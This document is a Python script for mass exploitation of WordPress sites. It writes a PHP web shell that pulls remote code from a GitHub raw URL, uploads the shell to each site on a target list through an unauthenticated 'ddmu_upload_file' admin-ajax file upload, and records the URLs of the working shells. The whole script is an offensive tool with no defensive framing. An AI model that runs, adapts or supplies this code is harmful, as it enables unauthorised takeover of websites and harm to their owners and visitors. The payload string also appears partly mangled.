import requests import re import time targets_file = input("Enter Url List: ").strip() shell_filename = "admin.php" output_file = "shell.txt" timeout_seconds = 25 headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" } payload = """".file_get_contents/*******/("https://raw.githubusercontent.com/Professor6T9/Filemanager/refs/heads/main/FM.txt"));/**/?>""" try: with open(shell_filename, "w", encoding="utf-8") as shell_file: shell_file.write(payload) print(f"[+] Wrote custom PHP shell to: {shell_filename}") except Exception as e: print(f"[!] Failed to write shell file: {e}") exit() try: with open(targets_file, "r", encoding="utf-8") as f: targets = [line.strip().rstrip("/") for line in f if line.strip()] except FileNotFoundError: print(f"[!] Targets file '{targets_file}' not found.") exit() success_count = 0 with open(output_file, "w", encoding="utf-8") as out: for target in targets: upload_url = f"{target}/wp-admin/admin-ajax.php?action=ddmu_upload_file" print(f"\n[+] Uploading to {upload_url}...") try: with open(shell_filename, "rb") as shell_file: files = { "uploadfile": (shell_filename, shell_file, "application/x-php") } response = requests.post(upload_url, files=files, headers=headers, timeout=timeout_seconds) if response.status_code == 200: match = re.search(r'(https?://[^\s"]+\.php)', response.text) if match: shell_url = match.group(1) print(f"[+] Shell uploaded: {shell_url}") out.write(shell_url + "\n") success_count += 1 else: print("[!] Upload succeeded but shell URL not found.") else: print(f"[!] Upload failed. Status: {response.status_code}") print(response.text) except Exception as e: print(f"[!] Error uploading to {target}: {e}") time.sleep(1) print(f"\n[+] Done. {success_count} working shells saved in '{output_file}'.")